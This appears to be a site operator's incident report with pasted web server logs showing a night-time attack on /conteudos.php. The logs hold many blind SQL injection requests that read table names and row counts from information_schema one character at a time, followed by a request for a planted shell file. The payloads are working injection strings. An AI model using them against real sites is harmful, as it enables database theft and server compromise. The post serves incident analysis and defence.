During the night an attacker planted a shell file on the server, using SQL injection, and COMODO Firewall didn't stop the attack.
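The logs (automated requests with User-Agent Java/1.8.0_25, all injecting into the id parameter of /conteudos.php to read table names and row counts from information_schema.tables, one character position at a time):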
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3028--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3029--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3030--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
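---> and here is the shell (this request is stamped 00:58:06, before the injection requests listed above, and its Referer is the backoffice banner editor, so the file may have been uploaded through the backoffice rather than written by the injection itself)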
5.249.87.35 - - [27/Feb/2015:00:58:06 +0000] "GET /imagens/topos/rc.php HTTP/1.1" 200 43661 "http://www.aoficina.pt/backoffice/bannerstopo/editar.php?id=13&ordem=id&pag=1&limit=100&pag_actual=listar.php&s=&ord=0" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"